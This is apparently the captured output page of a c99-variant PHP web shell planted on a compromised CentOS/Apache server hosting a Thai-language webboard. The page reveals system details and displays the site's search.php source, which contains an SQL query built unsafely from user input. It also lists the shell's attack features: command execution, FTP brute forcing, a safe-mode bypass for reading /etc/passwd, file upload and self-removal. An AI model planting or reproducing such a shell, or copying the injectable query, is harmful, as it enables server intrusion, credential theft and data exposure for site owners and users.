!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/webboard/   drwxr-xr-x
Free 52.39 GB of 127.8 GB (41%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     search.php (10.29 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
=1){
include("useronline.php");
}
include("function.php");
if(empty($Category)){
			echo "

";
			echo " กรุณาระบุ Category ให้ตรงกับที่ web เปิดใช้ด้วยครับ";
			echo "

";
			echo "[ กลับไปแก้ไข ]";
			echo "
";
		exit();		
	}
	else {
		$Category = CheckCategory($Category); 
	}
?>	

	
	
	<?echo $title?>
	
 

	
	
	
  

 
  

	

      

        
       


          ";
echo " มี ";
include("alluser.php"); 
?>
          
        

	    ค้นหาคำถาม 
          
	 
	

	

   

  \n";
	echo "    ผลจากการค้นหาคำว่า \" $search_topic \" เจอทั้งหมดจำนวน \" $NRow \" คำถาม\n";
	echo "

\n\n";

	// Query ข้อมูลตามจำนวนที่กำหนด
	$sql = "select * from webboard_data where Category='$Category' and Question like '%$search%' or Note like '%$search%' order by No DESC limit $goto,$list_page";
	$result = mysql_db_query($dbname,$sql);
	$NRow = mysql_num_rows($result);

	if($NRow==0) { 
		echo "
\n";
		echo "\n";
		echo "\n";
		echo "\n";
		exit();
	}
	// แสดงหัวข้อของบอร์ด
	else {
	echo "\n";
		echo "\n";
		echo "\t\n";
		echo "\t\n";
		echo "\t\n";
		echo "\t\n";
		echo "\n\n";

		// วนลูปแสดงข้อมูลที่อ่านได้
		while ($row = mysql_fetch_array($result)) {
			
			// กำหนดสีของตาราง เพื่อให้มีการสลับสี
			//$bgc = ($bgc=="lightcyan") ? "powderblue" : "lightcyan";

			$bgc = ($bgc==$rowColor1) ? $rowColor2 : $rowColor1; 

			// กำหนดค่าตัวแปร
			$No = sprintf("%05d",$row["No"]);
			$Question = $row["Question"];
			$Name = $row["Name"];
			$Namer = $row["Namer"];
			$Member = $row["Member"];
			$Memberr = $row["Memberr"];
			$nphoto = $row["nphoto"];
			$Date = trim(substr($row["Date"],-19,-9)); // แสดงเฉพาะวันที่
			$Reply = $row["Reply"];
			$ReplyDate = trim(substr($row["ReplyDate"],-19,-9)); 
			$pageviewdata = $row["pageview"];
			// แสดงเฉพาะวันที่
			if($Date==$chk_date) {
				echo "\n";
					
				}else {
			echo "\n";			
				}
			// แสดงรูป folder
			
					////new
			     
               if($Reply>="10" )
				    
				{
			    echo "\t\n";
		       }
			 elseif($ReplyDate!="") 
			         
			           {
				    echo "\t\n";
				      } 
             elseif($Date==$chk_date) 
				{
				echo "\t\n";
				      } 
					  
				     else {
				    echo "\t\n";
				           }


			if(($ReplyDate==$chk_date)&&($nphoto!='')&&($Date==$chk_date))			{
			echo "\t\n";
			}
			elseif(($ReplyDate==$chk_date)&&($nphoto!=''))			{
			echo "\t\n";
			}
			elseif(($ReplyDate==$chk_date) &&($Date==$chk_date))
				{echo "\t\n";
				      } 
			elseif($ReplyDate==$chk_date)
				{echo "\t\n";
				      } 
					  elseif(($nphoto!='') &&($Date==$chk_date))
				{echo "\t\n";
				
				      } 
					
					  elseif($nphoto!='') 
				{echo "\t\n";
				
				      } 
					
					   elseif($Date==$chk_date) 
				{echo "\t\n";
				
				      } 
			

			else{
				echo "\t\n";
			         }			

			if($Member) {
				echo "\t\n";
			}
			else {
				echo "\t\n";
			}
			
			// ตรวจสอบว่ามีคนตอบคำถามหรือยัง
if($Memberr) {
			if($ReplyDate!="" ) 
				{
				echo "\t\n";
			    }
			else 
				{
				echo "\t\n";
			    }
			echo "\n\n";
			
		}else{
		if($ReplyDate!="" ) 
				{
				echo "\t\n";
			    }
			else 
				{
				echo "\t\n";
			    }
			echo "\n\n";
		}
		
		}
		
		echo "
คำถามที่คำถาม-[จำนวนคำตอบ] [จำนวนคนเข้าอ่าน]ผู้ถาม[วันที่ถาม]ผู้ตอบ[วันที่ตอบ]
 $No $No $No $No$Question   [ $Reply ] [ $pageviewdata ]$Question   [ $Reply ] [ $pageviewdata ]$Question    [ $Reply ] [ $pageviewdata ]$Question   [ $Reply ] [ $pageviewdata ]$Question   [ $Reply ] [ $pageviewdata ]$Question   [ $Reply ] [ $pageviewdata ]$Question   [ $Reply ] [ $pageviewdata ]$Question [ $Reply ] [ $pageviewdata ]$Name   [$Date]$Name  [$Date] $Namer  [$ReplyDate] ยังไม่มีคนตอบ 
 $Namer [$ReplyDate] ยังไม่มีคนตอบ 
\n\n";
		
		
		
		// table อธิบายความหมายของรูป
		echo "\n";
		echo "\n";
		echo "
\n";
		echo "\t - คำถามใหม่ \n";
		echo "\t - คำถามเก่า \n";
		echo "\t - คำถามที่ถูกตอบแล้ว\n";
		echo "\t - คำถามที่มีคนตอบมาก\n";
		echo "\t - คำถามที่มีรูป\n";
		echo "\t - สมาชิกเว็บบอร์ด\n";
		echo "
\n\n";

		// table แสดงเลขหน้า
		echo "\n";
		echo "\n";
		echo "\n";
		echo "
\n";
		echo "\t\n";

		// สร้าง link เพื่อไปหน้าก่อน-หน้าถัดไป
		if($page>1 && $page<=$totalpage) {
			$prevpage = $page-1;
			echo "\t[หน้าก่อน = $prevpage]\n";
		}

		echo "\t กำลังแสดงหน้าที่ $page/$totalpage \n";

		if($page!=$totalpage) {
			$nextpage = $page+1;
			echo "\t[หน้าถัดไป = $nextpage]\n";
		}

		echo "\t\n";
		echo "
\n";

		// วนลูปแสดงเลขหน้าทั้งหมด
		for($i=1 ; $i<$page ; $i++) {
			echo "\t$i \n";
		}
		echo "\t$page \n";
		for($i=$page+1 ; $i<=$totalpage ; $i++) {
			echo "\t$i \n";
		}
	
		echo "
\n";
	}
?>
 
 [ ตั้งคำถามใหม่ 
]  


   
bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]--